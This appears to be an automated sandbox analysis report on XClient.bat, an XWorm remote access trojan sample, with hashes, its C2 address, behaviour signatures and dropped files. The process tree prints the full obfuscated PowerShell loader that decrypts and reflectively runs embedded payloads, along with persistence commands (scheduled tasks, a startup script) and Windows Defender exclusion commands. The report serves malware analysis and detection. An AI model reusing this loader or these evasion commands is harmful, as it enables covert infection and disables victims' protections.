Analysis

  • max time kernel
    148s
  • max time network
    150s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240508-en
  • resource tags

    arch:x64arch:x86image:win11-20240508-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    31-05-2024 11:46

General

  • Target

    XClient.bat

  • Size

    306KB

  • MD5

    5f114fbb47589f072b2329adeab0e2d7

  • SHA1

    1572da87baa2fcd945be9ca5073cf2c27a5e4eda

  • SHA256

    976bef5e2f4128e42bb344af988b88e188503c4f7df7452ee1a87947eea833a1

  • SHA512

    4ffba8c4bc5771f90b64825880e033192bbafdf1952a29893d35821dbe675fc57b942ff22831848e3081da751804572f61b214cdc8b2a42523d069343f112b69

  • SSDEEP

    6144:rCIqB5Xma5qnV7R+N8ymXO55y6wXYjuvgfazxjjNzMGryBNYqi/v:rJqnheT68ym6vfazxDyBiX

Malware Config

Extracted

Family

xworm

C2

19.ip.gl.ply.gg:38173

Attributes
  • Install_directory

    %Userprofile%

  • install_file

    Runtime Broker.exe

Signatures

  • Detect Xworm Payload 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

    Run Powershell and hide display window.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 17 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\XClient.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1932
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('W9ISWKk0uktoB21K/n8WP2z/EMIVG4ajR8KxvaCHQZc='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NiPaOPsEhb3GYyQq1AToPQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $TYqPW=New-Object System.IO.MemoryStream(,$param_var); $wUcjc=New-Object System.IO.MemoryStream; $lqjaM=New-Object System.IO.Compression.GZipStream($TYqPW, [IO.Compression.CompressionMode]::Decompress); $lqjaM.CopyTo($wUcjc); $lqjaM.Dispose(); $TYqPW.Dispose(); $wUcjc.Dispose(); $wUcjc.ToArray();}function execute_function($param_var,$param2_var){ $zoSsA=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $VRasO=$zoSsA.EntryPoint; $VRasO.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\XClient.bat';$qsbcF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\XClient.bat').Split([Environment]::NewLine);foreach ($jzVlk in $qsbcF) { if ($jzVlk.StartsWith(':: ')) { $ZvyRr=$jzVlk.Substring(3); break; }}$payloads_var=[string[]]$ZvyRr.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1784
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_476_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_476.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2176
      • C:\Windows\System32\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_476.vbs"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3536
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_476.bat" "
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4688
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('W9ISWKk0uktoB21K/n8WP2z/EMIVG4ajR8KxvaCHQZc='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NiPaOPsEhb3GYyQq1AToPQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $TYqPW=New-Object System.IO.MemoryStream(,$param_var); $wUcjc=New-Object System.IO.MemoryStream; $lqjaM=New-Object System.IO.Compression.GZipStream($TYqPW, [IO.Compression.CompressionMode]::Decompress); $lqjaM.CopyTo($wUcjc); $lqjaM.Dispose(); $TYqPW.Dispose(); $wUcjc.Dispose(); $wUcjc.ToArray();}function execute_function($param_var,$param2_var){ $zoSsA=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $VRasO=$zoSsA.EntryPoint; $VRasO.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_476.bat';$qsbcF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_476.bat').Split([Environment]::NewLine);foreach ($jzVlk in $qsbcF) { if ($jzVlk.StartsWith(':: ')) { $ZvyRr=$jzVlk.Substring(3); break; }}$payloads_var=[string[]]$ZvyRr.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Drops startup file
            • Adds Run key to start application
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:1028
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:4204
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:1684
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Runtime Broker.exe'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:2424
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Runtime Broker.exe'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:776
            • C:\Windows\System32\schtasks.exe
              "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Runtime Broker" /tr "C:\Users\Admin\Runtime Broker.exe"
              6⤵
              • Creates scheduled task(s)
              PID:3240
  • C:\Users\Admin\Runtime Broker.exe
    "C:\Users\Admin\Runtime Broker.exe"
    1⤵
    • Executes dropped EXE
    • Suspicious behavior: EnumeratesProcesses
    PID:4908

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

    Filesize

    3KB

    MD5

    df472dcddb36aa24247f8c8d8a517bd7

    SHA1

    6f54967355e507294cbc86662a6fbeedac9d7030

    SHA256

    e4e0fbc974e6946d20ddfaf22c543fccc4662d28e30530ec710fec149958f9b6

    SHA512

    06383259258a8c32f676ddaf7ea1fec3de7318ff1338f022e03c6b33458f2ce708e073ceb1aa26e3cf37f82dac37c8163b8ebd2de56b8530dffe177845c7adca

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    1KB

    MD5

    eb15ee5741b379245ca8549cb0d4ecf8

    SHA1

    3555273945abda3402674aea7a4bff65eb71a783

    SHA256

    b605e00d6056ae84f253f22adf37d6561a86d230c26fba8bfb39943c66e27636

    SHA512

    1f71fe8b6027feb07050715107039da89bb3ed5d32da9dca0138c393e0d705ebf3533bcccec49e70a44e0ec0c07809aef6befa097ad4ced18ca17ae98e6df0e4

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    944B

    MD5

    d0a4a3b9a52b8fe3b019f6cd0ef3dad6

    SHA1

    fed70ce7834c3b97edbd078eccda1e5effa527cd

    SHA256

    21942e513f223fdad778348fbb20617dd29f986bccd87824c0ae7f15649f3f31

    SHA512

    1a66f837b4e7fb6346d0500aeacb44902fb8a239bce23416271263eba46fddae58a17075e188ae43eb516c841e02c87e32ebd73256c7cc2c0713d00c35f1761b

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    944B

    MD5

    e8a7ab7bae6a69946da69507ee7ae7b0

    SHA1

    b367c72fa4948493819e1c32c32239aa6e78c252

    SHA256

    cd5480d72c1a359e83f7d6b6d7d21e1be2463f2c6718385cc6c393c88323b272

    SHA512

    89b22519bc3986be52801397e6eff4550621b4804abd2d04f431c9b2591ba8e3eab2625490a56ebb947ba3b122b6186badb6c461e917b69d7e13644c86a6f683

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    944B

    MD5

    4914eb0b2ff51bfa48484b5cc8454218

    SHA1

    6a7c3e36ce53b42497884d4c4a3bda438dd4374b

    SHA256

    7e510fc9344ef239ab1ab650dc95bb25fd44e2efba8b8246a3ac17880ee8b69e

    SHA512

    83ab35f622f4a5040ca5cb615a30f83bb0741449225f1fd1815b6923e225c28241d0c02d34f83f743349a5e57f84ca1c6f44016797a93d5985be41d11be79500

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xfzcuf0s.jne.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Roaming\startup_str_476.bat

    Filesize

    306KB

    MD5

    5f114fbb47589f072b2329adeab0e2d7

    SHA1

    1572da87baa2fcd945be9ca5073cf2c27a5e4eda

    SHA256

    976bef5e2f4128e42bb344af988b88e188503c4f7df7452ee1a87947eea833a1

    SHA512

    4ffba8c4bc5771f90b64825880e033192bbafdf1952a29893d35821dbe675fc57b942ff22831848e3081da751804572f61b214cdc8b2a42523d069343f112b69

  • C:\Users\Admin\AppData\Roaming\startup_str_476.vbs

    Filesize

    115B

    MD5

    86722163faccab24931ccf4edac53f1e

    SHA1

    f5d2754468b5abb0fcdeba18a9ee0760b2bf8f39

    SHA256

    616b6d73324d3bc1a1f0147f2381b7c75dfa8868f6ee8da518dbece692420991

    SHA512

    6267133dd0d085613222fa6c225761077117adf0a61978580111d219397b8e35c9f9b6971e33da7e67bf023bd080b2ca80bcdbdfbfa74c52789b31bd9e7aede4

  • C:\Users\Admin\Runtime Broker.exe

    Filesize

    440KB

    MD5

    0e9ccd796e251916133392539572a374

    SHA1

    eee0b7e9fdb295ea97c5f2e7c7ba3ac7f4085204

    SHA256

    c7d4e119149a7150b7101a4bd9fffbf659fba76d058f7bf6cc73c99fb36e8221

    SHA512

    e15c3696e2c96874242d3b0731ce0c790387ccce9a83a19634aed4d1efef72ce8b8fa683069950d652b16cd8d5e9daae9910df6d0a75cb74fdbe90ae5186765d

  • memory/1028-48-0x00000211B10D0000-0x00000211B10EC000-memory.dmp

    Filesize

    112KB

  • memory/1784-13-0x000001D223DF0000-0x000001D223DF8000-memory.dmp

    Filesize

    32KB

  • memory/1784-10-0x00007FFEE6670000-0x00007FFEE7132000-memory.dmp

    Filesize

    10.8MB

  • memory/1784-7-0x000001D223DC0000-0x000001D223DE2000-memory.dmp

    Filesize

    136KB

  • memory/1784-93-0x00007FFEE6673000-0x00007FFEE6675000-memory.dmp

    Filesize

    8KB

  • memory/1784-92-0x00007FFEE6670000-0x00007FFEE7132000-memory.dmp

    Filesize

    10.8MB

  • memory/1784-11-0x00007FFEE6670000-0x00007FFEE7132000-memory.dmp

    Filesize

    10.8MB

  • memory/1784-14-0x000001D23C0A0000-0x000001D23C0DC000-memory.dmp

    Filesize

    240KB

  • memory/1784-0-0x00007FFEE6673000-0x00007FFEE6675000-memory.dmp

    Filesize

    8KB

  • memory/1784-12-0x00007FFEE6670000-0x00007FFEE7132000-memory.dmp

    Filesize

    10.8MB

  • memory/2176-24-0x00007FFEE6670000-0x00007FFEE7132000-memory.dmp

    Filesize

    10.8MB

  • memory/2176-27-0x00007FFEE6670000-0x00007FFEE7132000-memory.dmp

    Filesize

    10.8MB

  • memory/2176-25-0x00007FFEE6670000-0x00007FFEE7132000-memory.dmp

    Filesize

    10.8MB

  • memory/2176-26-0x00007FFEE6670000-0x00007FFEE7132000-memory.dmp

    Filesize

    10.8MB

  • memory/2176-30-0x00007FFEE6670000-0x00007FFEE7132000-memory.dmp

    Filesize

    10.8MB

  • memory/4908-103-0x0000024FF98B0000-0x0000024FF98F6000-memory.dmp

    Filesize

    280KB